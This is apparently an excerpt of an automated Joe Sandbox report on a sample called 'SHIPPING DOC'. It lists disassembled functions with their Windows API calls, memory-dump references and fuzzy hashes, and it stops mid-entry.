                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Proc$Parent
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2351499541-0
                                                                                                                      • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                                                                      • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                                                                                                                      • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                                                                      • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                                                                                                                      APIs
                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                                                                                                                      • TranslateMessage.USER32(?), ref: 00442B01
                                                                                                                      • DispatchMessageW.USER32(?), ref: 00442B0B
                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Message$Peek$DispatchTranslate
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1795658109-0
                                                                                                                      • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                                                                      • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                                                                                                      • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                                                                      • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                                                                                                      APIs
                                                                                                                      • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                                                                                                        • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                                                                        • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                                                                        • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                                                                      • GetCaretPos.USER32(?), ref: 004743B2
                                                                                                                      • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                                                                                                      • GetForegroundWindow.USER32 ref: 004743EE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2759813231-0
                                                                                                                      • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                                                                      • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                                                                                                      • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                                                                      • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                                                                      • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                                                                                                                      • _wcslen.LIBCMT ref: 00449519
                                                                                                                      • _wcslen.LIBCMT ref: 00449526
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend_wcslen$_wcspbrk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2886238975-0
                                                                                                                      • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                                                                      • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                                                                                                                      • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                                                                      • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __setmode$DebugOutputString_fprintf
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1792727568-0
                                                                                                                      • Opcode ID: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                                                                                      • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                                                                                                                      • Opcode Fuzzy Hash: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                                                                                      • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                                                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                                                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                                                                                                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Long$AttributesLayered
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2169480361-0
                                                                                                                      • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                                                                      • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                                                                                                                      • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                                                                      • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                                                                                                        • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                                                                                                        • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                                                                                                      • lstrlenW.KERNEL32(?), ref: 00434CF6
                                                                                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                      • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                                                                                                      • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: lstrcmpilstrcpylstrlen$_malloc
                                                                                                                      • String ID: cdecl
                                                                                                                      • API String ID: 3850814276-3896280584
                                                                                                                      • Opcode ID: 5248fcd12fa573e8471e03ef3ffe1589e610c1ecd3e4c73a3bae80ffd9d943a4
                                                                                                                      • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                                                                                                      • Opcode Fuzzy Hash: 5248fcd12fa573e8471e03ef3ffe1589e610c1ecd3e4c73a3bae80ffd9d943a4
                                                                                                                      • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                                                                      • gethostbyname.WSOCK32(?), ref: 0046D42D
                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                                                                                                                      • _memmove.LIBCMT ref: 0046D475
                                                                                                                      • inet_ntoa.WSOCK32(?), ref: 0046D481
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2502553879-0
                                                                                                                      • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                                                                                      • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                                                                                                                      • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                                                                                      • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32 ref: 00448C69
                                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                                                                                                                      • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                                                                                                                      • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$LongWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 312131281-0
                                                                                                                      • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                                                                      • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                                                                                                                      • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                                                                      • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                                                                                                                      APIs
                                                                                                                      • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                                                                                                                      • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                                                                                                                      • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLastacceptselect
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 385091864-0
                                                                                                                      • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                                                                      • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                                                                                                                      • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                                                                      • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3850602802-0
                                                                                                                      • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                                                                      • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                                                                                                      • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                                                                      • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                                                                                                      APIs
                                                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                                                                                                      • GetStockObject.GDI32(00000011), ref: 00430258
                                                                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$CreateMessageObjectSendShowStock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1358664141-0
                                                                                                                      • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                                                                      • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                                                                                                      • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                                                                      • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                                                                                                      APIs
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                                                                                                      • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2880819207-0
                                                                                                                      • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                                                                      • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                                                                                                                      • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                                                                      • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                                                                                                                      APIs
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00430BA2
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00430BC1
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00430BE2
                                                                                                                      • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 357397906-0
                                                                                                                      • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                                                                      • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                                                                                                                      • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                                                                      • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                                                                                                                      APIs
                                                                                                                      • __wsplitpath.LIBCMT ref: 0043392E
                                                                                                                        • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                                      • __wsplitpath.LIBCMT ref: 00433950
                                                                                                                      • __wcsicoll.LIBCMT ref: 00433974
